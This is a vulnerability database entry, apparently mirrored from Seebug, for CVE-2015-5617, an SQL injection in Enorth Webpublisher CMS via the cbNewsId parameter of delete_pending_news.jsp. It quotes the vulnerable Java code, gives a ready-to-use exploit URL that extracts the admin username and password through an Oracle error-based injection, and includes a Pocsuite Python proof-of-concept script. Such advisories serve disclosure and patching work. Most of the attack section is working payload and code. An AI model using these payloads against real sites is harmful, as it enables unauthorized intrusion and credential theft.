http://products.enorth.com.cn/bfnrglxt/index....">Enorth Webpublisher CMS SQL Injection from delete_pending_news.jsp - exploit database | Vulners.comhttp://products.enorth.com.cn/bfnrglxt/index....">http://products.enorth.com.cn/bfnrglxt/index....">http://products.enorth.com.cn/bfnrglxt/index....">
Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugBit4SSV:89306
HistorySep 02, 2015 - 12:00 a.m.

Enorth Webpublisher CMS SQL Injection from delete_pending_news.jsp

2015-09-0200:00:00
bit4
www.seebug.org
26

0.004 Low

EPSS

Percentile

73.2%

JSON

<p>Title:</p><p>[CVE-2015-5617]Enorth Webpublisher CMS  SQL Injection from delete_pending_news.jsp cbNewsid</p><p>Vendor:</p><p><a href=“http://products.enorth.com.cn/bfnrglxt/index.shtml” target=“_blank”>http://products.enorth.com.cn/bfnrglxt/index.shtml</a></p><p>Enorth Webpublisher CMS so far of the scale of tens of thousands of web sites, with the government, enterprises, scientific research and education and media industries fields such as nearly thousands of business users.</p><p>Versions Affected:</p><p>All versions</p><p>Author:</p><p>xin.wang(xin.wang(at)dbappsecurity.com.cn)</p><p><b>Vulnerability Description:</b></p><p><b><i>/pub/m_pending_news/delete_pending_news.jsp</i></b></p><p><%</p><p>String[] newsIdGroup;</p><p>newsIdGroup = request.getParameterValues(“<font color=”#FF0000">cbNewsId</font>“);<font color=”#4DCE1D">//接受URL中的参数,但未做太多检查只是判读是否为空,长度是否为零。</font></p><p>if (newsIdGroup == null || newsIdGroup.length == 0) {</p><p>  throw new P3Exception(“mbx_news_submit_empty_news_id”);</p><p>} else {</p><p>    penTran.<font color=“#939600”>deletePendingNews</font>(newsIdGroup);<font color=“#4DCE1D”>//调用函数,如下内容。</font></p><p>}</p><p>%></p><p><b><i>/WEB-INF/classes/cn/com/enorth/pub3/m_news/PendingNewsBean.class</i></b></p><p>  public void <font color=“#C6C500”>deletePendingNews</font>(String[] newsIds) throws Exception {</p><p>    Connection cn = null;</p><p>    PreparedStatement pstm = null;</p><p>    try {</p><p>      StringBuffer buf = new StringBuffer();</p><p>      buf.append(“delete from tn_pending_news where news_id in (”); //SQL:delete from tn_pending_news where news_id in ( </p><p>      int i = 0; </p><p>     for (int len = newsIds.length; i < len; i++) {</p><p>        buf.append(newsIds[i]).append(“,”);//SQL:delete from tn_pending_news where news_id in (newsId0,newsId1,</p><p>      }</p><p>      buf.append(“-1)”);//SQL:delete from tn_pending_news where news_id in (newsId0,newsId1, …,-1)</p><p>  <u>   //注入后的SQL:delete from tn_pending_news where news_id in (2222)%20and%201=ctxsys.drithsx.sn(1,(select%20USER_NAME||PASS_WORD%20from%20TN_USER%20WHERE%20USER_ID=1))?,-1)</u></p><p>      cn = P3DBTools.getPubConnection();</p><p>      pstm = cn.prepareStatement(buf.toString());</p><p>      pstm.executeUpdate();//jQuery214026565031625297597_1441187851385</p><p>      cn.commit();</p><p>    } catch (Exception ex) {</p><p>      P3DBTools.rollback(cn);</p><p>      throw ex;</p><p>    } finally {</p><p>      P3DBTools.freeConnection(cn);</p><p>    }</p><p>  }</p><p>}</p><p><br></p><p>Exploit:</p><p><a href=“http://website.com/pub/m_pending_news/delete_pending_news.jsp?cbNewsId=2222) and 1=ctxsys.drithsx.sn(1,(select USER_NAME||PASS_WORD from TN_USER WHERE USER_ID=1))?” target=“_blank”>http://website.com/pub/m_pending_news/delete_pending_news.jsp?cbNewsId=2222)%20and%201=ctxsys.drithsx.sn(1,(select%20USER_NAME||PASS_WORD%20from%20TN_USER%20WHERE%20USER_ID=1))?</a></p>


                                                #!/usr/bin/env python
# coding: utf-8

from urlparse import urljoin
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    vulID = '89306'  # vul ID
    version = '1'
    author = ['cnyql']
    vulDate = '2015-09-02'
    createDate = '2015-09-02'
    updateDate = '2015-09-12'
    references = ['http://www.sebug.net/vuldb/ssvid-89306']
    name = 'Enorth Webpublisher CMS SQL Injection from delete_pending_news.jsp'
    appPowerLink = 'http://webpublisher.enorth.com.cn/'
    appName = 'Enorth Webpublisher CMS'
    appVersion = 'unknown'
    vulType = 'SQL Injection'
    desc = '''
    Enorth Webpublisher CMS so far of the scale of tens of thousands of web sites, with the government, enterprises, scientific research and education and media industries fields such as nearly thousands of business users.
    '''

    def _verify(self):
        payload = "pub/m_pending_news/delete_pending_news.jsp?cbNewsId=1)%20and%201=ctxsys.drithsx.sn(1,(Utl_Raw.Cast_To_Raw(sys.dbms_obfuscation_toolkit.md5(input_string => '3.14'))))?"
        # ORACLE ERROR BASED INJ

        res = req.get(urljoin(self.url, payload), timeout=5)
        return self.parse_verify(res, payload)
    
    def parse_verify(self, res, payload):
        output = Output(self)
        result = {}

        if '4beed3b9c4a886067de0e3a094246f78' in res.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = urljoin(self.url, payload)
            output.success(result)

        else:
            output.fail('Internet Nothing returned')

        return output


register(TestPOC)

Related

cve 1
zdt 1
cvelist 1
packetstorm 1
nvd 1
prion 1
cve
cve
CVE-2015-5617
2020-02-12 15:15:11
zdt
zdt
Enorth Webpublisher CMS SQL Injection Vulnerability
2015-08-14 00:00:00
cvelist
cvelist
CVE-2015-5617
2020-02-12 14:30:26
packetstorm
packetstorm
Enorth Webpublisher CMS SQL Injection
2015-08-13 00:00:00
nvd
nvd
CVE-2015-5617
2020-02-12 15:15:11
prion
prion
Sql injection
2020-02-12 15:15:00

0.004 Low

EPSS

Percentile

73.2%

JSON
Related for SSV:89306
cve1zdt1cvelist1packetstorm1nvd1prion1